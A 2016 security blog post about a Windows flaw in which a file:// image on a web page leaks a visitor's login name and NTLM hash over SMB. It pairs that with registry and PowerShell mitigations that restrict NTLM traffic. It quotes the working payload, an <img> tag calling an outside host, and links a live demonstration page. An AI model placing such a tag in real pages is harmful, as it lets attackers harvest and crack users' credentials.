4 August 2016

Stealing your Windows user credentials just with a website

Russian researcher ValdikSS has published a small proof-of-concept exploit that can steal your Windows credentials (login name and NTLM hash) when you merely visit a web page. The issue lies in the way the Windows operating system handles file:// URIs. When it encounters such a URI pointing at a remote host, the operating system sends an SMB NTLMSSP_NEGOTIATE request to the attacker's server, revealing your login name, domain name and the NTLM hash of your password.

Web page with fully working exploit is available here: hxxp://witch.valdikss.org.ru/

Do not visit this page from your corporate computer, as your password hash could be captured and cracked.

The page contains an image, <img src="file://witch.valdikss.org.ru/a">, which triggers the SMB negotiation.

Below is a screenshot taken on a stand-alone workstation:

As the screenshot shows, a simple password can be recovered from its NTLM hash within seconds. Hashes of stronger passwords can be stored and cracked later.

The exploit works on all modern Windows operating systems, including Windows 10, and it does not matter which browser you use, because the request is handled by the operating system itself.

The same applies to an integrated Microsoft account. If you sign in to your PC with a Microsoft account, attackers can steal those credentials too, and may then be able to access all Microsoft services tied to that Live ID, e.g. Skype, OneDrive, etc.

Protection

Set the RestrictSendingNTLMTraffic and RestrictReceivingNTLMTraffic registry values under the MSV1_0 key to disable this behavior, as in the .reg file below:

	 Windows Registry Editor Version 5.00
	 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0]
	 "RestrictReceivingNTLMTraffic"=dword:00000002
	 "RestrictSendingNTLMTraffic"=dword:00000002
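As an added example (not part of the original post), the following PowerShell script audits the two MSV1_0 values from the .reg file above and, when run with -Enforce, writes the same deny-all settings; the function names and the -Enforce switch are my own and assume an elevated session.

```powershell
# Added example, not from the original post: audit the NTLM restriction values
# under MSV1_0 and optionally enforce the deny-all setting shown in the .reg file.
# Run from an elevated PowerShell session; -Enforce is a switch defined here.
param([switch]$Enforce)

$Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0'

# Meaning of each DWORD, as defined by the "Network security: Restrict NTLM" policies.
$SendMeaning    = @{ 0 = 'Allow all'; 1 = 'Audit all'; 2 = 'Deny all' }
$ReceiveMeaning = @{ 0 = 'Allow all'; 1 = 'Deny all domain accounts'; 2 = 'Deny all accounts' }

function Get-NtlmRestriction {
    param([string]$Name, [hashtable]$Meaning)
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) {
        # A missing value behaves like 0 (Allow all), which is the Windows default.
        return [pscustomobject]@{ Name = $Name; Value = 'absent'; Meaning = 'Allow all (default)' }
    }
    $v = [int]$item.$Name
    $m = if ($Meaning.ContainsKey($v)) { $Meaning[$v] } else { "Unknown ($v)" }
    return [pscustomobject]@{ Name = $Name; Value = $v; Meaning = $m }
}

function Set-NtlmDenyAll {
    # Writes exactly what the .reg snippet above does: both values = 2.
    if (-not (Test-Path $Path)) { New-Item -Path $Path -Force | Out-Null }
    Set-ItemProperty -Path $Path -Name 'RestrictSendingNTLMTraffic'   -Value 2 -Type DWord
    Set-ItemProperty -Path $Path -Name 'RestrictReceivingNTLMTraffic' -Value 2 -Type DWord
}

Write-Host "Current NTLM restrictions on $($env:COMPUTERNAME):"
$send = Get-NtlmRestriction -Name 'RestrictSendingNTLMTraffic'   -Meaning $SendMeaning
$recv = Get-NtlmRestriction -Name 'RestrictReceivingNTLMTraffic' -Meaning $ReceiveMeaning
$send, $recv | Format-Table -AutoSize

# The outbound value is the one that stops the file:// leak: with anything other
# than 2, the machine will still answer a remote file:// image with NTLM credentials.
if ($send.Value -ne 2) {
    if ($Enforce) {
        Set-NtlmDenyAll
        Write-Host 'Outgoing and incoming NTLM traffic set to Deny all (2).'
    } else {
        Write-Warning 'Outgoing NTLM is not denied; re-run with -Enforce to apply the .reg settings.'
    }
}
```

RestrictSendingNTLMTraffic=2 blocks NTLM to every remote server, legitimate file shares included, so on domain-joined machines it is safer to start with 1 (Audit all) and review the Microsoft-Windows-NTLM/Operational event log before switching to deny.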
